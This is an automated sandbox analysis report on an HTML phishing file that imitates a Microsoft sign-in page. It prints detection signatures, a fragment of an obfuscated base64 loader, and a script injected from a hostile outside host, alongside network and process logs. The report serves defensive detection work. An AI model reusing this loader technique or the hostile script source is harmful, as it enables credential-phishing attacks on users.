Windows Analysis Report
malicious@sample.phishing.file.html

Overview

General Information

Sample Name: malicious@sample.phishing.file.html
Analysis ID: 1384103
MD5: b640b59ed75c8f24d4f8233f122062f0
SHA1: 34377f62b839937b4cb735d0291588002c36ddc0
SHA256: 1aad6b1a019b5dbc94a91e426ef198640f7e6dd9b63b0971ac495e6c52e5e8c2

Detection

HTMLPhisher
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected HtmlPhish10
Detected javascript redirector / loader
HTML file submission containing password form
HTML sample is only containing javascript code
HTML document with suspicious title
HTML root dynamically written
Call-Chain indicates evasion measures
HTML Script injector detected
Phishing site detected (based on image similarity)
Creates files inside the system directory
Script element or tag injection
None HTTPS page querying sensitive user data (password, username or email)
HTML body contains password input but no form action
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 4108 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\malicious@sample.phishing.file.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4632 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2312,i,9019154639734182260,6881670019935364994,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0.0.pages.csv | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |
    No Sigma rule has matched
    No Snort rule has matched

    Phishing

    Source: Yara match | File source: 0.0.pages.csv, type: HTML
    Source: malicious@sample.phishing.file.html | HTTP Parser: Low number of body elements: 0
    Source: malicious@sample.phishing.file.html | HTTP Parser: <script>var uid= "malicious@sample.phishing"; var _uid=['Jp','dmV','mh','0dH','GV','PC','Bz','aWN','2Fs','Zl','L2p','5jb','zL2','jc3','Jld','I+','yc','9z','WVy','cn','dCB','Oi8','5p','eS','i9','20v','cy','vdW','Q+','cH','lw','5q','PHN','vb','LW','pxd...
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.html | Tab title: Sign in to your account
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.html | JavaScript Tracing: Argument in call to document.write() contains HTML root: "<html lang="en">\x0a <head>\x0a <meta http-equiv="Content-Type" content="text/html; charset=UTF..."
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.html | JavaScript Tracing: Detected writing of HTML string to DOM using call to HTMLDocument.write() after method call to atob()
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.html | HTTP Parser: New script tag found
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.html | Matcher: Found strong image similarity, brand: MICROSOFT
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.html | JavaScript Tracing: HTML-tag "<script>" has been injected into the DOM within a string using HTMLDocument.write("<html lang="en">\x0a <head>\x0a <meta http-equiv="Content-Type" content="text/html; charset=UTF...");
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.html | JavaScript Tracing: HTML-tag "<script>" has been injected into the DOM within a string using HTMLDocument.write("<script src="https://universal-ferretera.com/icon/css./js/jquery.js"></script>");
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.html | HTTP Parser: Has password / email / username input fields
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.html | HTTP Parser: <input type="password" .../> found but no <form action="...
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.html | HTTP Parser: Title: Sign in to your account does not match URL
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.html | HTTP Parser: <input type="password" .../> found
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.html | HTTP Parser: No <meta name="author".. found
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.html | HTTP Parser: No <meta name="copyright".. found
    Source: unknown | HTTPS traffic detected: 23.209.58.93:443 -> 192.168.2.4:49745 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.209.58.93:443 -> 192.168.2.4:49746 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49751 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49760 version: TLS 1.2
    Source: unknown | TCP traffic detected without corresponding DNS query: 104.46.162.224
    Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknown | TCP traffic detected without corresponding DNS query: 23.209.58.93
    Source: unknown | TCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknown | HTTP traffic detected:
        POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
        Host: accounts.google.com
        Connection: keep-alive
        Content-Length: 1
        Origin: https://www.google.com
        Content-Type: application/x-www-form-urlencoded
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: empty
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
        Cookie: NID=511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk
    Source: unknown | DNS traffic detected: queries for: accounts.google.com
    Source: global traffic | HTTP traffic detected:
        GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
        Host: clients2.google.com
        Connection: keep-alive
        X-Goog-Update-Interactivity: fg
        X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
        X-Goog-Update-Updater: chromecrx-117.0.5938.132
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: empty
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic | HTTP traffic detected:
        GET /icon/css./js/jquery.js HTTP/1.1
        Host: universal-ferretera.com
        Connection: keep-alive
        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
        sec-ch-ua-platform: "Windows"
        Accept: */*
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: script
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic | HTTP traffic detected:
        GET /jquery-3.1.1.min.js HTTP/1.1
        Host: code.jquery.com
        Connection: keep-alive
        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
        sec-ch-ua-platform: "Windows"
        Accept: */*
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: script
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic | HTTP traffic detected:
        GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1
        Host: logincdn.msauth.net
        Connection: keep-alive
        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        sec-ch-ua-platform: "Windows"
        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: image
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic | HTTP traffic detected:
        GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1
        Host: logincdn.msauth.net
        Connection: keep-alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept: */*
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: cors
        Sec-Fetch-Dest: empty
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic | HTTP traffic detected:
        GET /16.000.28510.6/images/favicon.ico HTTP/1.1
        Host: logincdn.msauth.net
        Connection: keep-alive
        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        sec-ch-ua-platform: "Windows"
        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: image
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic | HTTP traffic detected:
        GET /16.000.28510.6/images/favicon.ico HTTP/1.1
        Host: logincdn.msauth.net
        Connection: keep-alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept: */*
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: cors
        Sec-Fetch-Dest: empty
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic | HTTP traffic detected:
        GET /fs/windows/config.json HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
        Range: bytes=0-2147483646
        User-Agent: Microsoft BITS/7.8
        Host: fs.microsoft.com
    Source: global traffic | HTTP traffic detected:
        GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3zR+716CuA+MVrv&MD=C4TvLgvC HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
        Host: slscr.update.microsoft.com
    Source: global traffic | HTTP traffic detected:
        GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3zR+716CuA+MVrv&MD=C4TvLgvC HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
        Host: slscr.update.microsoft.com
    Source: global traffic | HTTP traffic detected:
        GET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=0000000000000000000000000000000000000000904777ECD0 HTTP/1.1
        Host: clients1.google.com
        Connection: keep-alive
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: empty
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept-Encoding: gzip, deflate, br
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\chrome_BITS_4108_705123645
    Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\malicious@sample.phishing.file.html
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2312,i,9019154639734182260,6881670019935364994,262144 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: classification engine | Classification label: mal80.phis.evad.winHTML@26/6@12/13

    Stealing of Sensitive Information
